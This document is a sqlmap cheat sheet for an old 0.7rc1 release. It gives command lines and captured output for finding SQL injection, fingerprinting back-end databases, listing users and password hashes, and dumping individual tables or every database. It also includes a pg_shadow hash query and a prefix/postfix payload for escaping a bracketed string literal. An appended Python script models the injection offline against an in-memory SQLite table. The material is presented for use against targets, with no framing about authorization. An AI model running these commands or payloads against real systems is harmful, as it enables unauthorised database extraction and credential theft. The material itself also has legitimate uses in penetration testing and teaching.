Common injection statements (sqlmap cheat sheet)

Source: Internet
Author: User
Tags: web server, operating system
Compiled by mickey. If you repost this, respect the original author and note that mickey compiled it.

Sample fingerprint output from sqlmap against the test target:

    web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
    back-end DBMS: PostgreSQL

The option names below are those of sqlmap 0.7rc1 (the version in the User-Agent of the captured request further down). Later releases renamed or removed several of them (for example --postfix became --suffix, and --union-test/--stacked-test were folded into --technique), so check "python sqlmap.py -hh" for the version you are running. Where a command reads -u "?id=1", the scheme and host of the target URL are missing from the source; sections 3 to 11 use http://192.168.1.47/page.php?id=1&cat=2 as a concrete target.

1. Option reference

Check out the development version:

    svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Run SQL statements interactively (-v 1 prints more detailed information):

    python sqlmap.py -u "?id=1" -v 1 --sql-shell

Read options from an INI configuration file:

    python sqlmap.py -c sqlmap.conf

Submit with the POST method:

    python sqlmap.py -u "<target>/sqlmap/oracle/post_int.php" --method POST --data "<post body>"

Set the User-Agent, or pick one at random from a file of user agents:

    python sqlmap.py -u "?id=1" --user-agent "Mozilla/..."
    python sqlmap.py -u "?id=1" -a "<file with one user agent per line>"

HTTP Basic or Digest authentication:

    python sqlmap.py -u "?id=1" --auth-type Basic --auth-cred "<user>:<password>"
    python sqlmap.py -u "?id=1" --auth-type Digest --auth-cred "<user>:<password>"

Go through a proxy, or through a Tor proxy:

    python sqlmap.py -u "?id=1" --proxy "http://192.168.1.47:3128"
    python sqlmap.py -u "?id=1" --proxy "http://192.168.1.47:8118"

Multi-threaded guessing:

    python sqlmap.py -u "?id=1" --threads <n>

Skip the dynamic-parameter detection and name the injectable parameter(s) directly (comma-separated for more than one), optionally together with a User-Agent:

    python sqlmap.py -u "?id=1" -p "id"
    python sqlmap.py -u "?id=1&cat=2" -p "cat,id"
    python sqlmap.py -u "?id=1" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

Name the DBMS to skip sqlmap's automatic detection (supported: MySQL, Oracle, PostgreSQL, Microsoft SQL Server):

    python sqlmap.py -u "<target>/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

Name the operating system to skip automatic detection (supported: Linux, Windows):

    python sqlmap.py -u "<target>/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

Custom payload: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix. Take a page whose query wraps the parameter in quotes and brackets:

    ... FROM users WHERE id=('<id>') LIMIT 0, 1

    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --postfix "AND ('test'='test"

    [...]
    [hh:mm:16] [INFO] testing SQL injection on GET parameter 'id' with 0 parenthesis
    [hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
    [hh:mm:16] [traffic out] HTTP request:
    GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
    Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    Host: 192.168.1.121:80
    Accept-language: en-us,en;q=0.5
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
    Connection: close
    [...]
    [hh:mm:17] [INFO] GET parameter 'id' is custom injectable
    [...]

As you can see, the injection payload used to test for custom injection is:

    id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL-decoded is:

    id=1') AND 7433=7433 AND ('test'='test

and makes the page's query syntactically correct:

    ... FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example sqlmap could have detected and exploited the SQL injection without a custom payload, but in real-world applications it is sometimes necessary to provide one.

Page comparison (tell true from false responses by a string or a regular expression):

    python sqlmap.py -u "?id=1" --string "luther" -v 1
    python sqlmap.py -u "?id=1" --regexp "Lu[\w][\w]er" -v 1

Exclude dynamic page content from the comparison:

    python sqlmap.py -u "?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked-query (multi-statement) test. Not supported when the PHP page goes through mysql_query(), which refuses multiple statements:

    python sqlmap.py -u "?id=1" --stacked-test -v 1

UNION query injection test, and the same test using the ORDER BY technique to find the column count:

    python sqlmap.py -u "?id=1" --union-test -v 1
    python sqlmap.py -u "?id=1" --union-test --union-tech orderby -v 1

Retrieve data through UNION query injection:

    python sqlmap.py -u "?id=1" -v 1 --union-use --banner
    python sqlmap.py -u "?id=1" -v 5 --union-use --current-user
    python sqlmap.py -u "?id=1" -v 1 --union-use --dbs

Fingerprint the DBMS (with -b, also retrieve the banner):

    python sqlmap.py -u "?id=1" -v 1 -f
    python sqlmap.py -u "?name=luther" -v 1 -f -b

Check whether the current user is a DBA:

    python sqlmap.py -u "?id=1" --is-dba -v 1

List database users:

    python sqlmap.py -u "?id=1" --users -v 0

List database users' password hashes (all users, or one user with -U):

    python sqlmap.py -u "?id=1" --passwords -v 0
    python sqlmap.py -u "?id=1" --passwords -U sa -v 0

List users' privileges:

    python sqlmap.py -u "?id=1" --privileges -v 0
    python sqlmap.py -u "?id=1" --privileges -U postgres -v 0

List databases:

    python sqlmap.py -u "?id=1" --dbs -v 0

List the columns of a given table in a given database:

    python sqlmap.py -u "?id=1" --columns -T users -D test -v 1

Dump one column of a given table in a given database:

    python sqlmap.py -u "?id=1" --dump -T users -D master -C surname -v 0

Dump only rows 2 to 4 (--start/--stop select output entries, not columns):

    python sqlmap.py -u "?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump every table of every database:

    python sqlmap.py -u "?id=1" --dump-all -v 0

Dump only user-created databases and tables, skipping the system databases:

    python sqlmap.py -u "?id=1" --dump-all --exclude-sysdbs -v 0

Run an arbitrary SQL query:

    python sqlmap.py -u "?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
    python sqlmap.py -u "?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

A useful PostgreSQL query for the above (pg_shadow is readable only by superusers, so it needs a DBA-level injection):

    SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and resume a session:

    python sqlmap.py -u "?id=1" -b -v 1 -s "sqlmap.log"

Save the options to an INI configuration file:

    python sqlmap.py -u "?id=1" -b -v 1 --save

2. Injection through a Google search

    sqlmap -g "keyword"

This injects through a Google search. It is not working yet; I don't know why. The search site can be changed to Baidu directly.

3. Basic run with output

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1

    [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
    [hh:mm:26] [INFO] url is stable
    [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
    [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
    [hh:mm:26] [INFO] GET parameter 'id' is dynamic
    [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
    [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
    [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
    [hh:mm:26] [INFO] testing MySQL
    [hh:mm:26] [INFO] retrieved: 55
    [hh:mm:26] [INFO] performed 20 queries in 0 seconds
    [hh:mm:26] [INFO] confirming MySQL
    [hh:mm:26] [INFO] retrieved: 1
    [hh:mm:26] [INFO] performed 13 queries in 0 seconds
    [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
    [hh:mm:26] [INFO] retrieved: 5
    [hh:mm:26] [INFO] performed 13 queries in 0 seconds
    remote DBMS: MySQL >= 5.0.0

4. Name the parameter(s) to inject

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"

    [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
    [hh:mm:18] [INFO] url is stable
    [hh:mm:18] [INFO] testing numeric/unescaped injection on GET parameter 'id'
    [hh:mm:18] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
    [hh:mm:18] [INFO] GET parameter 'id' is numeric/unescaped injectable
    [...]

With -p the dynamic-parameter check is skipped. To provide more than one parameter:

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"

5. POST method and data

    python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

6. Supply a cookie, for pages that require a logged-in session

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"

7. Inject through a proxy

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"

8. Specify a string that appears only on the true page. If none is given, the program decides by itself from the hash of the returned pages.

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"

9. Specify the DBMS so that sqlmap does not have to test for the others; this saves requests.

    --dbms "<DBMS>"   (listed as --remote-dbms in the source)

10. Fingerprint the database type

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f

11. Retrieve the banner

    python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
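The custom-payload walkthrough and the page-comparison options (--string, --excl-reg, the "url is stable" check) are easier to follow with a runnable model. The following Python is an added example, not code from this cheat sheet or from sqlmap itself: it simulates the bracketed-string page from the custom-payload section with an in-memory SQLite table, assembles the prefix/test/postfix payload, URL-encodes it the way the captured request shows, and performs the true/false page comparison with and without a dynamic-content exclusion. The users table, the "luther" marker and the "Dynamic content: N" counter are constructed sample data and are not taken from the page.

```python
"""Offline model of sqlmap's --prefix/--postfix, --string and --excl-reg logic
against a page whose query wraps the parameter as id=('...').

Added example: not code from the cheat sheet or from sqlmap. Assumptions not
taken from the page: the back end is an in-memory SQLite table named users,
and the page body, the 'luther' marker and the 'Dynamic content: N' counter
are constructed sample data."""
import hashlib
import itertools
import re
import sqlite3
from typing import Optional, Tuple
from urllib.parse import quote

# Shape of the vulnerable query from the walkthrough: input lands inside ('...').
QUERY_TEMPLATE = "SELECT name FROM users WHERE id=('{}') LIMIT 0, 1"

_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
_db.executemany("INSERT INTO users VALUES (?, ?)",
                [(1, "luther"), (2, "fluffy"), (3, "wu")])  # constructed rows
_counter = itertools.count(1000)  # per-request noise, like a hit counter


def vulnerable_page(id_value: str) -> str:
    """Stand-in for get_str_brackets.php: splices the raw parameter into the SQL
    and renders the matching name plus a counter that changes on every request."""
    try:
        row = _db.execute(QUERY_TEMPLATE.format(id_value)).fetchone()
    except sqlite3.OperationalError:
        row = None  # a syntax error renders the page without a name
    body = f"<p>Dynamic content: {next(_counter)}</p>"
    body += f"<p>Name: {row[0]}</p>" if row else "<p>no such user</p>"
    return body


def build_payload(value: str, prefix: str, test: str, postfix: str) -> str:
    """<value><prefix> <test> <postfix>: how --prefix and --postfix wrap the
    boolean test sqlmap injects (for example 'AND 7433=7433')."""
    return f"{value}{prefix} {test} {postfix}".rstrip()


def url_encode(payload: str) -> str:
    """Encodes the way the [traffic out] request shows: '=' stays bare, every
    other non-alphanumeric character becomes %XX."""
    return quote(payload, safe="=")


def normalise(body: str, excl_reg: Optional[str]) -> str:
    """Applies --excl-reg: drop content that changes between requests."""
    return re.sub(excl_reg, "", body) if excl_reg else body


def page_hash(body: str, excl_reg: Optional[str] = None) -> str:
    """Fingerprint used when no --string/--regexp is supplied."""
    return hashlib.md5(normalise(body, excl_reg).encode()).hexdigest()


def is_url_stable(value: str, excl_reg: Optional[str] = None) -> bool:
    """'testing if the url is stable': two identical requests must hash alike."""
    first = page_hash(vulnerable_page(value), excl_reg)
    second = page_hash(vulnerable_page(value), excl_reg)
    return first == second


def is_custom_injectable(value: str, prefix: str, postfix: str, string: str,
                         excl_reg: Optional[str] = None) -> Tuple[bool, str]:
    """Boolean-based test: the --string marker must appear on the original page
    and on the page for a true condition, and be absent for a false one.
    Returns (injectable, URL-encoded true payload)."""
    true_payload = build_payload(value, prefix, "AND 7433=7433", postfix)
    false_payload = build_payload(value, prefix, "AND 7433=7434", postfix)
    seen = [string in normalise(vulnerable_page(p), excl_reg)
            for p in (value, true_payload, false_payload)]
    return seen == [True, True, False], url_encode(true_payload)


if __name__ == "__main__":
    print("url stable, no --excl-reg  :", is_url_stable("1"))
    print("url stable, with --excl-reg:", is_url_stable("1", r"Dynamic content: [\d]+"))
    print("plain AND test             :", is_custom_injectable("1", "", "", "luther"))
    print("--prefix \"')\" --postfix \"AND ('test'='test\":",
          is_custom_injectable("1", "')", "AND ('test'='test", "luther"))
```

Run it directly: the stability check fails until the counter is excluded, which is what --excl-reg is for; the plain AND test never matches because the whole payload is swallowed by the ('...') literal, while the prefixed payload closes the literal and the bracket and produces exactly the encoded string from the captured request, so the query sqlmap ends up running is the one shown in the walkthrough.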
